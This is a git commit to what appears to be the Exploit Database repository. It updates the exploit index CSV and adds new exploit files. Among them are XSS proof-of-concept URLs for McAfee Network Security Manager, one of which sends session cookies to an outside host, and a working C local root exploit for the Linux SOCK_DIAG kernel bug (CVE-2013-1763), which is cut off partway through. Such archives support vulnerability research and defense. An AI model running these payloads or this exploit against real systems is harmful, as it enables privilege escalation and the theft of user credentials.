Updated 05_15_2014

This commit is contained in:
Offensive Security 2014-05-15 04:36:26 +00:00
parent 3a841992e3
commit 7371706026
23 changed files with 1422 additions and 631 deletions

View file

@ -3605,7 +3605,7 @@ id,file,description,date,author,platform,type,port
3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0
3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0
3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0
3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
@ -4945,9 +4945,9 @@ id,file,description,date,author,platform,type,port
5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0
5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability",2008-03-25,girex,php,webapps,0
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit",2008-03-26,muts,windows,dos,0
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0
5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection Vulnerability",2008-04-14,S@BUN,php,webapps,0
5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0
5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0
@ -9075,7 +9075,7 @@ id,file,description,date,author,platform,type,port
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability",2009-09-09,DokFLeed,asp,webapps,0
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
@ -9131,7 +9131,7 @@ id,file,description,date,author,platform,type,port
9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0
9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0
9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0
9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3V!L,asp,webapps,0
9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0
@ -9146,12 +9146,12 @@ id,file,description,date,author,platform,type,port
9687,platforms/windows/local/9687.py,"SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 (ping option) Command Injection Vulnerability (auth)",2009-09-15,r00t,hardware,local,0
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0
9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0
9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0
9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0
9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0
9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0
@ -9189,7 +9189,7 @@ id,file,description,date,author,platform,type,port
9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0
@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port
10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
@ -10111,7 +10111,7 @@ id,file,description,date,author,platform,type,port
10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0
10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3V!L,php,webapps,0
10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0
10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0
10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port
11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0
11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0
11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 DoS",2010-03-25,_SuBz3r0_,windows,dos,69
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69
11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0
@ -14130,7 +14130,7 @@ id,file,description,date,author,platform,type,port
16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0
16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0
16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
@ -14206,7 +14206,7 @@ id,file,description,date,author,platform,type,port
16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 Buffer Overflow",2010-11-30,metasploit,windows,remote,0
16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0
@ -19700,7 +19700,7 @@ id,file,description,date,author,platform,type,port
22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0
22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0
22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0
22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0
22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0
@ -21680,8 +21680,8 @@ id,file,description,date,author,platform,type,port
24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2 SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0
24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
@ -21887,7 +21887,7 @@ id,file,description,date,author,platform,type,port
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers - Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
24748,platforms/php/webapps/24748.txt,"event calendar Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
@ -30035,6 +30035,7 @@ id,file,description,date,author,platform,type,port
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 CVE-2009-3382 Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
@ -30049,3 +30050,18 @@ id,file,description,date,author,platform,type,port
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0
33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0
33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0
33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0
33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0
33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0
33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0
33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0

Can't render this file because it is too large.

12
platforms/jsp/webapps/33346.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37003/info
McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57

11
platforms/jsp/webapps/33347.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37004/info
McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism.
A successful exploit may allow attackers to steal cookie-based authentication credentials; information harvested may aid in further attacks.
This issue affects McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57

13
platforms/linux/dos/33338.c Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/36953/info
The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}

164
platforms/linux/local/33336.txt Executable file
View file

@ -0,0 +1,164 @@
/*
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* bug found by Spender
* poc by SynQ
*
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
* using nl_table->hash.rehash_time, index 81
*
* Fedora 18 support added
*
* 2/2013
*/
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
int jump_payload_not_used(void *skb, void *nlh)
{
asm volatile (
"mov $kernel_code, %eax\n"
"call *%eax\n"
);
}
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym[512];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (!f) {
return 0;
}
while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
if (ret == 0) {
fscanf(f, "%s\n", sym);
continue;
}
if (!strcmp(name, sym)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
int main(int argc, char*argv[])
{
int fd;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
return -1;
}
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
//req.r.sdiag_family = 89;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
if(argc==1){
printf("Run: %s Fedora|Ubuntu\n",argv[0]);
return 0;
}
else if(strcmp(argv[1],"Fedora")==0){
commit_creds = (_commit_creds) get_symbol("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
sock_diag_handlers = get_symbol("sock_diag_handlers");
nl_table = get_symbol("nl_table");
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
printf("some symbols are not available!\n");
exit(1);
}
family = (nl_table - sock_diag_handlers) / 4;
printf("family=%d\n",family);
req.r.sdiag_family = family;
if(family>255){
printf("nl_table is too far!\n");
exit(1);
}
}
else if(strcmp(argv[1],"Ubuntu")==0){
commit_creds = (_commit_creds) 0xc106bc60;
prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
req.r.sdiag_family = 81;
}
unsigned long mmap_start, mmap_size;
mmap_start = 0x10000;
mmap_size = 0x120000;
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
